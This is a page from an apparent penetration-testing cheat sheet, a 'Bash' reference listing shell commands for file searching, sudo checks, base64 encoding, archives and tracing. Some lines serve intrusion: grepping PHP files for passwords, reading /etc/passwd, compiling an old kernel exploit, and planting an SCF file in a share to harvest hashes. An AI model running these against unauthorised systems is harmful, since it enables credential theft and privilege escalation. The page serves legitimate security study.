d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Related
  • find
  • sudo
  • file
  • wc
  • rlwrap
  • Permissions
  • authbind
  • base64
  • Linux
  • Windows
  • grep
  • watch
  • sed
  • cut
  • cron
  • sort unique
  • File size
  • ascii table
  • ltrace / strace
  • gcc
  • Specific files
  • .tar.gz
  • .7z
  • .vhd
  • .scf
  • Images with hidden content
Edit on GitHub
  1. Misc

Bash

PreviousVBScript: Wget cloneNextBurp Suite

Last updated 3 years ago

Related

find

find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null

Writable files

find / -writable

sudo

List commands, current user can run as root

sudo -l

-> Run the command as a user other than the default target user (usually root).

sudo -u <user> <command>

-> Useful in scenarios like this:

User <user1> may run the following commands on bashed:
    (<user2> : <user2>) NOPASSWD: ALL

Asks the system to start a new login session for the specified user. The system will require the password for the user "username" (even if its the same as the current user).

su - <user>

file

Get information about file

file <file>

wc

Count chars

wc -c

Count lines

wc -l

rlwrap

A 'readline wrapper', a small utility that uses the GNU readline library to allow the editing of keyboard input for any command.

rlwrap <cmd>

Permissions

Define permissions new files get on creation, opposite (mask) to chmod permissions

umask

authbind

bind sockets to privileged ports (<1024) without being root

authbind <command>

base64

Linux

File

Encode base64 -w 0 <file> > <base64file> Decode base64 -d <base64file> > <file>

String

Encode echo -n <string> | base64 Decode echo <base64string> | base64 -d

Windows

File

Encode certutil -encode <file> tmp.b64 && findstr /v /c:- tmp.b64 > <base64file> Decode certutil -decode <base64file> <file>

grep

Print x-lines Before match Print x-lines After match Ignore-case

grep -i -A5 -B5 <string> <filename>
<cmd> | grep -A5 -B5 "text"

Recursive

grep -R "text" .
grep -oP '\d{1,5}/open' nmap_results.gnmap |  > ports

watch

Run command every second

watch -n 1 '<command>'

sed

Trim whitespaces

sed 's/ //g'

Remove newlines

sed -z 's/\n//g' <file>

cut

Split string by delimiter, extract field 2

echo "some,strings" | cut -d "," -f 2 // outputs "strings"

Split file by colon

cut -d ":" -f 1 /etc/passwd

cron

List user's crontab

crontab -l

sort unique

sort -u

File size

du -hs <file>

ascii table

man ascii

ltrace / strace

Trace library calls of a given program.

ltrace ./<programm>

Alternative

strace ./<programm>

gcc

Use -m32 or -m64 to make the architecture explicit

gcc <file>.c -o <file>

Compile for old 32bit kernel (2.6.9)

gcc -o 1397 1397.c -m32 -Wl,--hash-style=both

Specific files

.tar.gz

-c		create
-x		extract
-f		file (must be last flag)
-v		verbose
-z		gzip

Create archive

tar -zcvf

Extract archive

tar -zxvf

.7z

Extract

7z x <archive.7z>
7z l <file>

.vhd

guestmount --add <vhd-file> --inspector --ro -v /mnt/vhd

.scf

Images with hidden content

binwalk

Tool for searching binary images for embedded files and executable code

binwalk -Me <image-file>

Place scf file in windows share to gather hashes

Process monitoring
GTFOBins
Base64 Encode or Decode on the command line without installing extra tools on Linux, Windows or macOS | Igor Kromin
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/